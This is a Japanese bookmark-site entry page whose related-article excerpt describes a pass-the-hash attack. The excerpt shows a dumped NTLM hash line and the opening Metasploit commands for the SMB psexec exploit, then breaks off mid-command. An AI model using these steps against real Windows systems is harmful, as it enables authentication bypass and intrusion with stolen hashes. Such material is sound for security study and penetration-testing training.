エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
記事へのコメント1件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
PsExecを利用したセッション確立
ハッシュ値さえあれば、パスワードがわからなくても認証突破できる。 認証の仕組みがわかってれば当たり... ハッシュ値さえあれば、パスワードがわからなくても認証突破できる。 認証の仕組みがわかってれば当たり前っちゃ当たり前。 認証の仕組みについては、これがわかりやすいかも。 http://www.blackhat.com/presentations/bh-asia-04/bh-jp-04-seki.ppt LMハッシュでもNTLMハッシュでも ハッシュ値を元に認証してるから、ハッシュ値さえ手に入れられれば認証できる。 実際にやってみた。 対象ホストのハッシュ値を得る。 sh4rk:500:NO PASSWORD*********************:C9BB070441DA0819B07A213D6732F0C8::: 【流れ】 # ./msfconsole msf> use exploit/windows/smb/psexec msf exploit(psexec)> set